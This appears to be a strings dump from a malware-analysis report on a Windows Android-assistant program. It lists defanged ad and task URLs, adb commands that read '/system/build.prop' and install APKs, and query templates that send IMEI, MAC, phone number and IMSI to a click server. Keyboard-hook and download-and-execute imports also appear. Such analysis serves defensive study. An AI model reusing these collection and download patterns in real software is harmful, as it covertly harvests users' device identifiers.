.qcp=audio/vnd.qcelp
.qcp=audio/vnd.qcelp
.ra=audio/x-realaudio
.ra=audio/x-realaudio
.wav=audio/x-wav
.wav=audio/x-wav
.gsm=audio/x-gsm
.gsm=audio/x-gsm
.wax=audio/x-ms-wax
.wax=audio/x-ms-wax
.wma=audio/x-ms-wma
.wma=audio/x-ms-wma
.ram=audio/x-pn-realaudio
.ram=audio/x-pn-realaudio
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.mjf=audio/x-vnd.AudioExplosion.MjuiceMediaFile
.bmp=image/bmp
.bmp=image/bmp
.gif=image/gif
.gif=image/gif
.jpg=image/jpeg
.jpg=image/jpeg
.jpeg=image/jpeg
.jpeg=image/jpeg
.jpe=image/jpeg
.jpe=image/jpeg
.pict=image/x-pict
.pict=image/x-pict
.png=image/x-png
.png=image/x-png
.svg=image/svg-xml
.svg=image/svg-xml
.tif=image/x-tiff
.tif=image/x-tiff
.rf=image/vnd.rn-realflash
.rf=image/vnd.rn-realflash
.rp=image/vnd.rn-realpix
.rp=image/vnd.rn-realpix
.ico=image/x-icon
.ico=image/x-icon
.art=image/x-jg
.art=image/x-jg
.pntg=image/x-macpaint
.pntg=image/x-macpaint
.qtif=image/x-quicktime
.qtif=image/x-quicktime
.sgi=image/x-sgi
.sgi=image/x-sgi
.targa=image/x-targa
.targa=image/x-targa
.xbm=image/xbm
.xbm=image/xbm
.psd=image/x-psd
.psd=image/x-psd
.pnm=image/x-portable-anymap
.pnm=image/x-portable-anymap
.pbm=image/x-portable-bitmap
.pbm=image/x-portable-bitmap
.pgm=image/x-portable-graymap
.pgm=image/x-portable-graymap
.ppm=image/x-portable-pixmap
.ppm=image/x-portable-pixmap
.rgb=image/x-rgb
.rgb=image/x-rgb
.xbm=image/x-xbitmap
.xbm=image/x-xbitmap
.xpm=image/x-xpixmap
.xpm=image/x-xpixmap
.xwd=image/x-xwindowdump
.xwd=image/x-xwindowdump
.xml=text/xml
.xml=text/xml
.uls=text/iuls
.uls=text/iuls
.txt=text/plain
.txt=text/plain
.rtx=text/richtext
.rtx=text/richtext
.wsc=text/scriptlet
.wsc=text/scriptlet
.rt=text/vnd.rn-realtext
.rt=text/vnd.rn-realtext
.htt=text/webviewhtml
.htt=text/webviewhtml
.htc=text/x-component
.htc=text/x-component
.vcf=text/x-vcard
.vcf=text/x-vcard
.avi=video/x-msvideo
.avi=video/x-msvideo
.flc=video/flc
.flc=video/flc
.mpeg=video/x-mpeg2a
.mpeg=video/x-mpeg2a
.mov=video/quicktime
.mov=video/quicktime
.rv=video/vnd.rn-realvideo
.rv=video/vnd.rn-realvideo
.ivf=video/x-ivf
.ivf=video/x-ivf
.wm=video/x-ms-wm
.wm=video/x-ms-wm
.wmp=video/x-ms-wmp
.wmp=video/x-ms-wmp
.wmv=video/x-ms-wmv
.wmv=video/x-ms-wmv
.wmx=video/x-ms-wmx
.wmx=video/x-ms-wmx
.wvx=video/x-ms-wvx
.wvx=video/x-ms-wvx
.rms=video/vnd.rn-realvideo-secure
.rms=video/vnd.rn-realvideo-secure
.asx=video/x-ms-asf-plugin
.asx=video/x-ms-asf-plugin
.movie=video/x-sgi-movie
.movie=video/x-sgi-movie
.wmd=application/x-ms-wmd
.wmd=application/x-ms-wmd
.wms=application/x-ms-wms
.wms=application/x-ms-wms
.wmz=application/x-ms-wmz
.wmz=application/x-ms-wmz
.p7b=application/x-pkcs7-certificates
.p7b=application/x-pkcs7-certificates
.p7r=application/x-pkcs7-certreqresp
.p7r=application/x-pkcs7-certreqresp
.qtl=application/x-quicktimeplayer
.qtl=application/x-quicktimeplayer
.rtsp=application/x-rtsp
.rtsp=application/x-rtsp
.swf=application/x-shockwave-flash
.swf=application/x-shockwave-flash
.sit=application/x-stuffit
.sit=application/x-stuffit
.tar=application/x-tar
.tar=application/x-tar
.man=application/x-troff-man
.man=application/x-troff-man
.urls=application/x-url-list
.urls=application/x-url-list
.zip=application/x-zip-compressed
.zip=application/x-zip-compressed
.cdf=application/x-cdf
.cdf=application/x-cdf
.fml=application/x-file-mirror-list
.fml=application/x-file-mirror-list
.fif=application/fractals
.fif=application/fractals
.spl=application/futuresplash
.spl=application/futuresplash
.hta=application/hta
.hta=application/hta
.hqx=application/mac-binhex40
.hqx=application/mac-binhex40
.doc=application/msword
.doc=application/msword
.pdf=application/pdf
.pdf=application/pdf
.cer=application/x-x509-ca-cert
.cer=application/x-x509-ca-cert
.crl=application/pkix-crl
.crl=application/pkix-crl
.ps=application/postscript
.ps=application/postscript
.sdp=application/x-sdp
.sdp=application/x-sdp
.setpay=application/set-payment-initiation
.setpay=application/set-payment-initiation
.setreg=application/set-registration-initiation
.setreg=application/set-registration-initiation
.smil=application/smil
.smil=application/smil
.ssm=application/streamingmedia
.ssm=application/streamingmedia
.xfdf=application/vnd.adobe.xfdf
.xfdf=application/vnd.adobe.xfdf
.fdf=application/vnd.fdf
.fdf=application/vnd.fdf
.xls=application/x-msexcel
.xls=application/x-msexcel
.sst=application/vnd.ms-pki.certstore
.sst=application/vnd.ms-pki.certstore
.pko=application/vnd.ms-pki.pko
.pko=application/vnd.ms-pki.pko
.cat=application/vnd.ms-pki.seccat
.cat=application/vnd.ms-pki.seccat
.stl=application/vnd.ms-pki.stl
.stl=application/vnd.ms-pki.stl
.rmf=application/vnd.rmf
.rmf=application/vnd.rmf
.rm=application/vnd.rn-realmedia
.rm=application/vnd.rn-realmedia
.rnx=application/vnd.rn-realplayer
.rnx=application/vnd.rn-realplayer
.rjs=application/vnd.rn-realsystem-rjs
.rjs=application/vnd.rn-realsystem-rjs
.rmx=application/vnd.rn-realsystem-rmx
.rmx=application/vnd.rn-realsystem-rmx
.rmp=application/vnd.rn-rn_music_package
.rmp=application/vnd.rn-rn_music_package
.rsml=application/vnd.rn-rsml
.rsml=application/vnd.rn-rsml
.vsl=application/x-cnet-vsl
.vsl=application/x-cnet-vsl
.tgz=application/x-compressed
.tgz=application/x-compressed
.dir=application/x-director
.dir=application/x-director
.gz=application/x-gzip
.gz=application/x-gzip
.uin=application/x-icq
.uin=application/x-icq
.hpf=application/x-icq-hpf
.hpf=application/x-icq-hpf
.pnq=application/x-icq-pnq
.pnq=application/x-icq-pnq
.scm=application/x-icq-scm
.scm=application/x-icq-scm
.ins=application/x-internet-signup
.ins=application/x-internet-signup
.iii=application/x-iphone
.iii=application/x-iphone
.latex=application/x-latex
.latex=application/x-latex
.nix=application/x-mix-transfer
.nix=application/x-mix-transfer
.wbmp=image/vnd.wap.wbmp
.wbmp=image/vnd.wap.wbmp
.wml=text/vnd.wap.wml
.wml=text/vnd.wap.wml
.wmlc=application/vnd.wap.wmlc
.wmlc=application/vnd.wap.wmlc
.wmls=text/vnd.wap.wmlscript
.wmls=text/vnd.wap.wmlscript
.wmlsc=application/vnd.wap.wmlscriptc
.wmlsc=application/vnd.wap.wmlscriptc
.css=text/css
.css=text/css
.htm=text/html
.htm=text/html
.html=text/html
.html=text/html
.shtml=server-parsed-html
.shtml=server-parsed-html
.sgm=text/sgml
.sgm=text/sgml
.sgml=text/sgml
.sgml=text/sgml
C:\builds\TpAddons\IndyNet\Protocols\IdGlobalProtocols.pas
C:\builds\TpAddons\IndyNet\Protocols\IdGlobalProtocols.pas
*#% []
*#% []
C:\builds\TpAddons\IndyNet\Protocols\IdCoder3to4.pas
C:\builds\TpAddons\IndyNet\Protocols\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length exceeded (expected
TIdEncoder3to4.Encode: Calculated length exceeded (expected
TIdEncoder3to4.Encode: Calculated length not met (expected
TIdEncoder3to4.Encode: Calculated length not met (expected
password
password
CommentURL
CommentURL
%s, %d-%s-%d %s GMT
%s, %d-%s-%d %s GMT
C:\builds\TpAddons\IndyNet\Protocols\IdZLibCompressorBase.pas
C:\builds\TpAddons\IndyNet\Protocols\IdZLibCompressorBase.pas
C:\builds\TpAddons\IndyNet\Core\IdThread.pas
C:\builds\TpAddons\IndyNet\Core\IdThread.pas
C:\builds\TpAddons\IndyNet\Core\IdScheduler.pas
C:\builds\TpAddons\IndyNet\Core\IdScheduler.pas
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPassword
ProxyPassword
ProxyPort
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
%d%s%d
%d%s%d
TIdHTTPOption
TIdHTTPOption
IdHTTP
IdHTTP
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPOnHeadersAvailable
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol
TIdHTTPProtocol
TIdCustomHTTP
TIdCustomHTTP
TIdHTTP
TIdHTTP
HTTPOptions8
HTTPOptions8
EIdHTTPProtocolException
EIdHTTPProtocolException
C:\builds\TpAddons\IndyNet\Protocols\IdHTTP.pas
C:\builds\TpAddons\IndyNet\Protocols\IdHTTP.pas
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTPS
HTTPS
https
https
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
1.2.8
1.2.8
Invalid ZStream operation!
Invalid ZStream operation!
CRC Error in "%s".
CRC Error in "%s".
SetupApi.dll
SetupApi.dll
SetupDiOpenClassRegKey
SetupDiOpenClassRegKey
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKeyExW
SetupDiOpenClassRegKeyExW
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiOpenDeviceInterfaceRegKey
SetupDiOpenDeviceInterfaceRegKey
SetupDiDeleteDeviceInterfaceRegKey
SetupDiDeleteDeviceInterfaceRegKey
SetupDiCreateDevRegKeyA
SetupDiCreateDevRegKeyA
SetupDiCreateDevRegKeyW
SetupDiCreateDevRegKeyW
SetupDiOpenDevRegKey
SetupDiOpenDevRegKey
SetupDiDeleteDevRegKey
SetupDiDeleteDevRegKey
*.inf
*.inf
hXXp://device.sj.91.com/Controller.ashx?action=getdriverid
hXXp://device.sj.91.com/Controller.ashx?action=getdriverid
hXXp://device.sj.91.com/Controller.ashx?action=driverdownload&DeviceID=
hXXp://device.sj.91.com/Controller.ashx?action=driverdownload&DeviceID=
OnActionExecute
OnActionExecute
TOnPaintWebICOEvent
TOnPaintWebICOEvent
ScrollLeftPic
ScrollLeftPic
OnPaintWebICO
OnPaintWebICO
LinkUrl
LinkUrl
Fav%d.dat
Fav%d.dat
EInvalidGridOperation
EInvalidGridOperation
goAlwaysShowEditor
goAlwaysShowEditor
FormKeyPress
FormKeyPress
lblUrl
lblUrl
hXXp://web.fx.sushouspell.com/Handler/Handler.ashx?action=like&id=
hXXp://web.fx.sushouspell.com/Handler/Handler.ashx?action=like&id=
hXXp://web.fx.sushouspell.com/fav.aspx?id=
hXXp://web.fx.sushouspell.com/fav.aspx?id=
UhU%S
UhU%S
favicon.ico
favicon.ico
{9E816DCA-4908-4832-9836-7DF7EC25F9D8}
{9E816DCA-4908-4832-9836-7DF7EC25F9D8}
C:\builds\TpAddons\IndyNet\Core\IdServerIOHandlerSocket.pas
C:\builds\TpAddons\IndyNet\Core\IdServerIOHandlerSocket.pas
C:\builds\TpAddons\IndyNet\Core\IdSchedulerOfThread.pas
C:\builds\TpAddons\IndyNet\Core\IdSchedulerOfThread.pas
%s User
%s User
IdCustomTCPServer
IdCustomTCPServer
TIdCustomTCPServer
TIdCustomTCPServer
TIdHTTPSession
TIdHTTPSession
VHTTPSession
VHTTPSession
TIdHTTPCommandEvent
TIdHTTPCommandEvent
TIdHTTPRequestInfo
TIdHTTPRequestInfo
TIdHTTPResponseInfo
TIdHTTPResponseInfo
TIdHTTPInvalidSessionEvent
TIdHTTPInvalidSessionEvent
EIdHTTPServerError
EIdHTTPServerError
EIdHTTPHeaderAlreadyWritten`RS
EIdHTTPHeaderAlreadyWritten`RS
EIdHTTPErrorParsingCommand
EIdHTTPErrorParsingCommand
%EIdHTTPUnsupportedAuthorisationScheme
%EIdHTTPUnsupportedAuthorisationScheme
)EIdHTTPCannotSwitchSessionStateWhenActive
)EIdHTTPCannotSwitchSessionStateWhenActive
IdCustomHTTPServer
IdCustomHTTPServer
TIdHTTPCustomSessionList
TIdHTTPCustomSessionList
TIdHTTPCustomSessionListtVS
TIdHTTPCustomSessionListtVS
TIdCustomHTTPServer
TIdCustomHTTPServer
DefaultPort|PS
DefaultPort|PS
TIdHTTPDefaultSessionList
TIdHTTPDefaultSessionList
TIdHTTPDefaultSessionListD[S
TIdHTTPDefaultSessionListD[S
TIdHTTPSessionCleanerThreadS
TIdHTTPSessionCleanerThreadS
IDHTTPSESSIONID
IDHTTPSESSIONID
C:\builds\TpAddons\IndyNet\Protocols\IdCustomHTTPServer.pas
C:\builds\TpAddons\IndyNet\Protocols\IdCustomHTTPServer.pas
Indy/10.1.5
Indy/10.1.5
HTTP/1.1
HTTP/1.1
TIdHTTPServer
TIdHTTPServer
IdHTTPServer
IdHTTPServer
THttpWaitServer
THttpWaitServer
adb.exe
adb.exe
aapt.exe
aapt.exe
AdbWinApi.dll
AdbWinApi.dll
AdbWinUsbApi.dll
AdbWinUsbApi.dll
shell am startservice -a android.save.applist
shell am startservice -a android.save.applist
Android 2.3.3
Android 2.3.3
AndroidAssistTmp.apk
AndroidAssistTmp.apk
shell cat /system/build.prop
shell cat /system/build.prop
ro.product.model=
ro.product.model=
android.permission.ACCESS_COARSE_LOCATION=
android.permission.ACCESS_COARSE_LOCATION=
android.permission.ACCESS_FINE_LOCATION=
android.permission.ACCESS_FINE_LOCATION=
android.permission.ACCESS_NETWORK_STATE=
android.permission.ACCESS_NETWORK_STATE=
android.permission.ACCESS_WIFI_STATE=
android.permission.ACCESS_WIFI_STATE=
android.permission.ADD_SYSTEM_SERVICE=
android.permission.ADD_SYSTEM_SERVICE=
android.permission.BATTERY_STATS=
android.permission.BATTERY_STATS=
android.permission.BLUETOOTH=
android.permission.BLUETOOTH=
android.permission.BLUETOOTH_ADMIN=
android.permission.BLUETOOTH_ADMIN=
android.permission.BRICK=
android.permission.BRICK=
android.permission.CALL_PRIVILEGED=
android.permission.CALL_PRIVILEGED=
android.permission.CAMERA=
android.permission.CAMERA=
android.permission.CHANGE_CONFIGURATION=
android.permission.CHANGE_CONFIGURATION=
android.permission.CHANGE_NETWORK_STATE=
android.permission.CHANGE_NETWORK_STATE=
android.permission.CHANGE_WIFI_STATE=
android.permission.CHANGE_WIFI_STATE=
android.permission.CLEAR_APP_CACHE=
android.permission.CLEAR_APP_CACHE=
android.permission.CLEAR_APP_USER_DATA=
android.permission.CLEAR_APP_USER_DATA=
android.permission.DELETE_CACHE_FILES=
android.permission.DELETE_CACHE_FILES=
android.permission.DELETE_PACKAGES=
android.permission.DELETE_PACKAGES=
android.permission.DEVICE_POWER=
android.permission.DEVICE_POWER=
android.permission.INJECT_EVENTS=
android.permission.INJECT_EVENTS=
android.permission.INSTALL_PACKAGES=
android.permission.INSTALL_PACKAGES=
android.permission.INTERNET=
android.permission.INTERNET=
android.permission.MODIFY_PHONE_STATE=
android.permission.MODIFY_PHONE_STATE=
android.permission.MOUNT_UNMOUNT_FILESYSTEMS=
android.permission.MOUNT_UNMOUNT_FILESYSTEMS=
android.permission.PROCESS_OUTGOING_CALLS=
android.permission.PROCESS_OUTGOING_CALLS=
android.permission.READ_CONTACTS=
android.permission.READ_CONTACTS=
android.permission.READ_SMS=
android.permission.READ_SMS=
android.permission.REBOOT=
android.permission.REBOOT=
android.permission.RECEIVE_BOOT_COMPLETED=
android.permission.RECEIVE_BOOT_COMPLETED=
android.permission.RECEIVE_MMS=
android.permission.RECEIVE_MMS=
android.permission.RECEIVE_SMS=
android.permission.RECEIVE_SMS=
android.permission.RECORD_AUDIO=
android.permission.RECORD_AUDIO=
android.permission.RESTART_PACKAGES=
android.permission.RESTART_PACKAGES=
android.permission.SEND_SMS=
android.permission.SEND_SMS=
android.permission.WRITE_CONTACTS=
android.permission.WRITE_CONTACTS=
android.permission.WRITE_SETTINGS=
android.permission.WRITE_SETTINGS=
android.permission.WRITE_SMS=
android.permission.WRITE_SMS=
android.permission.STATUS_BAR=
android.permission.STATUS_BAR=
android.permission.WRITE_EXTERNAL_STORAGE=
android.permission.WRITE_EXTERNAL_STORAGE=
android.permission.GET_TASKS=
android.permission.GET_TASKS=
android.permission.SYSTEM_ALERT_WINDOW=
android.permission.SYSTEM_ALERT_WINDOW=
android.permission.WAKE_LOCK=
android.permission.WAKE_LOCK=
android.permission.READ_PHONE_STATE=
android.permission.READ_PHONE_STATE=
com.android.launcher.permission.INSTALL_SHORTCUT=
com.android.launcher.permission.INSTALL_SHORTCUT=
android.permission.CHANGE_WIFI_MULTICAST_STATE=
android.permission.CHANGE_WIFI_MULTICAST_STATE=
android.permission.VIBRATE=
android.permission.VIBRATE=
com.android.vending.BILLING=
com.android.vending.BILLING=
android.webkit.permission.PLUGIN=
android.webkit.permission.PLUGIN=
android.permission.ACCESS_DOWNLOAD_MANAGER=
android.permission.ACCESS_DOWNLOAD_MANAGER=
com.android.launcher.permission.UNINSTALL_SHORTCUT=
com.android.launcher.permission.UNINSTALL_SHORTCUT=
com.android.launcher.permission.WRITE_SETTINGS=
com.android.launcher.permission.WRITE_SETTINGS=
com.android.launcher.permission.READ_SETTINGS=
com.android.launcher.permission.READ_SETTINGS=
android.permission.BACKUP_DATA=
android.permission.BACKUP_DATA=
android.permission.ACCESS_COARSE_UPDATES=
android.permission.ACCESS_COARSE_UPDATES=
android.permission.RAISED_THREAD_PRIORITY=
android.permission.RAISED_THREAD_PRIORITY=
android.permission.READ_USER_DICTIONARY=
android.permission.READ_USER_DICTIONARY=
android.permission.WRITE_USER_DICTIONARY=
android.permission.WRITE_USER_DICTIONARY=
android.permission.VIBRATION=
android.permission.VIBRATION=
com.android.browser.permission.READ_HISTORY_BOOKMARKS=
com.android.browser.permission.READ_HISTORY_BOOKMARKS=
android.permission.WRITE_SECURE_SETTINGS=
android.permission.WRITE_SECURE_SETTINGS=
com.android.browser.permission.WRITE_HISTORY_BOOKMARKS=
com.android.browser.permission.WRITE_HISTORY_BOOKMARKS=
android.permission.USE_SIP=
android.permission.USE_SIP=
android.permission.USE_CREDENTIALS=
android.permission.USE_CREDENTIALS=
android.permission.UPDATE_DEVICE_STATS=
android.permission.UPDATE_DEVICE_STATS=
android.permission.SET_TIME=
android.permission.SET_TIME=
com.android.alarm.permission.SET_ALARM=
com.android.alarm.permission.SET_ALARM=
android.permission.NFC=
android.permission.NFC=
android.permission.MOUNT_FORMAT_FILESYSTEMS=
android.permission.MOUNT_FORMAT_FILESYSTEMS=
android.permission.MASTER_CLEAR=
android.permission.MASTER_CLEAR=
android.permission.KILL_BACKGROUND_PROCESSES=
android.permission.KILL_BACKGROUND_PROCESSES=
android.permission.INSTALL_LOCATION_PROVIDER=
android.permission.INSTALL_LOCATION_PROVIDER=
android.permission.GLOBAL_SEARCH=
android.permission.GLOBAL_SEARCH=
android.permission.BIND_DEVICE_ADMIN=
android.permission.BIND_DEVICE_ADMIN=
android.permission.BIND_APPWIDGET=
android.permission.BIND_APPWIDGET=
android.permission.SET_WALLPAPER=
android.permission.SET_WALLPAPER=
android.permission.SET_TIME_ZONE=
android.permission.SET_TIME_ZONE=
android.permission.SET_WALLPAPER_HINTS=
android.permission.SET_WALLPAPER_HINTS=
android.permission.SET_PROCESS_LIMIT=
android.permission.SET_PROCESS_LIMIT=
android.permission.SET_PROCESS_FOREGROUND=
android.permission.SET_PROCESS_FOREGROUND=
android.permission.SET_ORIENTATION=
android.permission.SET_ORIENTATION=
android.permission.SET_DEBUG_APP=
android.permission.SET_DEBUG_APP=
android.permission.SET_ANIMATION_SCALE=
android.permission.SET_ANIMATION_SCALE=
android.permission.SET_ALWAYS_FINISH=
android.permission.SET_ALWAYS_FINISH=
android.permission.SET_ACTIVITY_WATCHER=
android.permission.SET_ACTIVITY_WATCHER=
android.permission.RECEIVE_WAP_PUSH=
android.permission.RECEIVE_WAP_PUSH=
android.permission.READ_SYNC_SETTINGS=
android.permission.READ_SYNC_SETTINGS=
android.permission.READ_SYNC_STATS=
android.permission.READ_SYNC_STATS=
android.permission.READ_LOGS=
android.permission.READ_LOGS=
android.permission.READ_FRAME_BUFFER=
android.permission.READ_FRAME_BUFFER=
android.permission.READ_INPUT_STATE=
android.permission.READ_INPUT_STATE=
android.permission.READ_CALENDAR=
android.permission.READ_CALENDAR=
android.permission.PERSISTENT_ACTIVITY=
android.permission.PERSISTENT_ACTIVITY=
android.permission.MODIFY_AUDIO_SETTINGS=
android.permission.MODIFY_AUDIO_SETTINGS=
android.permission.INTERNAL_SYSTEM_WINDOW=
android.permission.INTERNAL_SYSTEM_WINDOW=
android.permission.GET_PACKAGE_SIZE=
android.permission.GET_PACKAGE_SIZE=
android.permission.FORCE_BACK=
android.permission.FORCE_BACK=
android.permission.FLASHLIGHT=
android.permission.FLASHLIGHT=
android.permission.FACTORY_TEST=
android.permission.FACTORY_TEST=
android.permission.DUMP=
android.permission.DUMP=
android.permission.DISABLE_KEYGUARD=
android.permission.DISABLE_KEYGUARD=
android.permission.DIAGNOSTIC=
android.permission.DIAGNOSTIC=
android.permission.CONTROL_LOCATION_UPDATES=
android.permission.CONTROL_LOCATION_UPDATES=
android.permission.CALL_PHONE=
android.permission.CALL_PHONE=
android.permission.ACCESS_SURFACE_FLINGER=
android.permission.ACCESS_SURFACE_FLINGER=
android.permission.ACCESS_MOCK_LOCATION=
android.permission.ACCESS_MOCK_LOCATION=
android.permission.CHANGE_COMPONENT_ENABLED_STATE=
android.permission.CHANGE_COMPONENT_ENABLED_STATE=
uWebBrowser
uWebBrowser
TWLFtp
TWLFtp
KOLFTP
KOLFTP
xcftp
xcftp
applist.json
applist.json
p.dat
p.dat
THttpDownProgeress
THttpDownProgeress
.tsk.cfg
.tsk.cfg
dwonJsMobile.dat
dwonJsMobile.dat
CmdTask
CmdTask
TThreadMobileCmd
TThreadMobileCmd
TThreadMobileCmdInstall
TThreadMobileCmdInstall
TThreadMobileCmdUnInstall
TThreadMobileCmdUnInstall
uTthreadMobileCmd
uTthreadMobileCmd
lblURL
lblURL
lblURLClick
lblURLClick
lblURLMouseEnter
lblURLMouseEnter
lblURLMouseLeave
lblURLMouseLeave
VVV.sushouspell.com
VVV.sushouspell.com
frmWebShow
frmWebShow
ShowWebForm:
ShowWebForm:
TFormWebShow WebNavParms.URL:
TFormWebShow WebNavParms.URL:
TFormWebShow.wb1 not HandleAllocated
TFormWebShow.wb1 not HandleAllocated
frmLoginTips
frmLoginTips
TMonochromeLookup
TMonochromeLookup
Act_Logint
Act_Logint
pngtbshtWeb
pngtbshtWeb
pngtbshtMobWeb
pngtbshtMobWeb
Act_MaxExecute
Act_MaxExecute
Act_MinExecute
Act_MinExecute
Act_HomePageExecute
Act_HomePageExecute
Act_ShowTrayExecute
Act_ShowTrayExecute
Act_CloseExecute
Act_CloseExecute
Act_AboutExecute
Act_AboutExecute
Act_CloseOrTrayExecute
Act_CloseOrTrayExecute
Act_CheckUpdateExecute
Act_CheckUpdateExecute
Act_AutoRunExecute
Act_AutoRunExecute
Act_ShowUserPnlExecute
Act_ShowUserPnlExecute
Act_LoginExecute
Act_LoginExecute
Act_RegExecute
Act_RegExecute
Act_RefExecute
Act_RefExecute
edtSearchKeyPress#
edtSearchKeyPress#
hXXp://web.vsnis.com/index.html?action=search&keyword=
hXXp://web.vsnis.com/index.html?action=search&keyword=
OpenUrl
OpenUrl
/WebShell
/WebShell
/WebShell2
/WebShell2
btns.js
btns.js
hXXp://web.fx.sushouspell.com/btns/btns.js
hXXp://web.fx.sushouspell.com/btns/btns.js
\temp.zip
\temp.zip
rpcrt4.dll
rpcrt4.dll
hXXp://web.vsnis.com/renwu.html?uid=
hXXp://web.vsnis.com/renwu.html?uid=
WMOpenWebUrl
WMOpenWebUrl
hXXp://web.vsnis.com/json/task/task.js
hXXp://web.vsnis.com/json/task/task.js
hXXp://json.app.sushouspell.com/app/json/advstyle/4.js
hXXp://json.app.sushouspell.com/app/json/advstyle/4.js
hXXp://json.app.sushouspell.com/app/json/advstyle/9.js
hXXp://json.app.sushouspell.com/app/json/advstyle/9.js
%s %s %s %s
%s %s %s %s
?appid=%s&appver=%s&userid=%s&softid=%s&signcode=%s&imie=%s&mac=%s&phonenumber=%s&imsi=%s
?appid=%s&appver=%s&userid=%s&softid=%s&signcode=%s&imie=%s&mac=%s&phonenumber=%s&imsi=%s
?appid=%s&appver=%s&userid=%s&advid=%s&styleid=%s&signcode=%s&imie=%s&mac=%s&phonenumber=%s&imsi=%s
?appid=%s&appver=%s&userid=%s&advid=%s&styleid=%s&signcode=%s&imie=%s&mac=%s&phonenumber=%s&imsi=%s
hXXp://clk.app.sushouspell.com/adv/ins.aspx
hXXp://clk.app.sushouspell.com/adv/ins.aspx
TFormWebShowOnly
TFormWebShowOnly
TFormWebShowOnly !V
TFormWebShowOnly !V
frmWebShowOnly
frmWebShowOnly
pTipsType:%d
pTipsType:%d
ShellExecute
ShellExecute
888888888888888
888888888888888
888888888888
888888888888
88888888888
88888888888
88888888
88888888
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
)4."1-2(
)4."1-2(
*5/#2.3)
*5/#2.3)
",71@5 &
",71@5 &
3'627-"(
3'627-"(
1 '-7#&0
1 '-7#&0
1&,#84 .'*
1&,#84 .'*
- 8!3(.%
- 8!3(.%
7&-3!),6%
7&-3!),6%
#5*0' 8$2 .
#5*0' 8$2 .
8'.4"*-7& 0#
8'.4"*-7& 0#
("2%!&8-3*#
("2%!&8-3*#
/5,%!)703
/5,%!)703
(03!,&6)%* 17.'#
(03!,&6)%* 17.'#
$/6 *25#.(8 ',"3
$/6 *25#.(8 ',"3
&18",47%0*
&18",47%0*
'2, / 0&7!4-)1#8
'2, / 0&7!4-)1#8
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
inflate 1.0.4 Copyright 1995-1996 Mark Adler
inflate 1.0.4 Copyright 1995-1996 Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
JSZSU.exe
JSZSU.exe
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
GetKeyboardType
GetKeyboardType
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetKeyboardState
SetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyA
MapVirtualKeyA
LoadKeyboardLayoutA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameA
GetKeyboardLayoutNameA
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextA
GetKeyNameTextA
GetAsyncKeyState
GetAsyncKeyState
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
version.dll
version.dll
WinExec
WinExec
PeekNamedPipe
PeekNamedPipe
GetWindowsDirectoryA
GetWindowsDirectoryA
GetCPInfo
GetCPInfo
CreatePipe
CreatePipe
RegQueryInfoKeyA
RegQueryInfoKeyA
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileA
URLDownloadToFileA
FindNextUrlCacheEntryExA
FindNextUrlCacheEntryExA
InternetOpenUrlA
InternetOpenUrlA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
FtpGetFileA
FtpGetFileA
FindCloseUrlCache
FindCloseUrlCache
DeleteUrlCacheEntry
DeleteUrlCacheEntry
ShellExecuteExA
ShellExecuteExA
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
comdlg32.dll
comdlg32.dll
wsock32.dll
wsock32.dll
iphlpapi.dll
iphlpapi.dll
ws2_32.dll
ws2_32.dll
GdipGetStringFormatHotkeyPrefix
GdipGetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
GdipSetImageAttributesColorKeys
GdipSetImageAttributesColorKeys
shlwapi.dll
shlwapi.dll
newdev.dll
newdev.dll
winmm.dll
winmm.dll
5 5]6 7(7
5 5]6 7(7
4%5S5
4%5S5
3
6 6$6(6,6064686
=!=$=)=-=1=5=9===
5 5$5(5,505
9 9$9(9,9
